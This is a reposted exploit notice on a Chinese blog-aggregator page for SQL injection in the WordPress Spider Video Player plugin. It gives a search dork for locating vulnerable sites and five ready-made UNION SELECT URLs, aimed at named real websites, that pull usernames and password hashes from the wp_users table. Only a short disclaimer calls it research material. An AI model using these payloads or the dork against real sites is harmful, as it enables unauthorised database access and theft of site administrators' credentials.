zoukankan      html  css  js  c++  java

  • Wordpress Spider Video Player plugin SQL Injection

    测试方法:

    程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
      1. # Exploit Title : Wordpress Spider Video Player plugin SQL Injection
      2. #
      3. # Exploit Author : Ashiyane Digital Security Team
      4. #
      5. # Plugin Link : http://web-dorado.com/
      6. #
      7. # Home : www.ashiyane.org
      8. #
      9. # Security Risk : High
      10. #
      11. # Version : 2.1
      12. #
      13. # Dork : inurl:wp-content/plugins/player/settings.php?playlist=
      14. #
      15. # Tested on: Linux
      16. #
      17. ##############
      18. #Location:site/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
      19. #
      20. #
      21. #DEm0:
      22. # http://www.voyager-channel.org/wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      23. #
      24. # http://juanmontoyalopez.es/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=-6+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      25. #
      26. # http://tremendum.org/wp-content/plugins/player/settings.php?playlist=1&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      27. #
      28. # http://generalcapitalinvestments.com/wp-content/plugins/player/settings.php?playlist=1&theme=-4+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      29. #
      30. # http://www.lancssa.com/wp-content/plugins/player/settings.php?playlist=2&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      31. #
      32. ##############
      33. #Greetz to: My Lord ALLAH
      34. ##############
      35. #
      36. # Amirh03in
      37. #
      38. ##############
  • 相关阅读:
    15天学会jquery
    js常用方法
    js兼容注意事项--仅供参考
    Javascript面向对象特性实现封装、继承、接口详细案例
    关于sql用<>不等于查询数据不对问题
    解决document.onclick在IE下用不了或无效的问题
    解决Button设置disabled后无法执行后台代码问题
    利用Wireshark截取数据包,并对数据包进行解析
    导入本地文本中的数据到MySQL数据库中
    删除数据库中重复项
  • 原文地址:https://www.cnblogs.com/security4399/p/3015576.html
Copyright © 2011-2022 走看看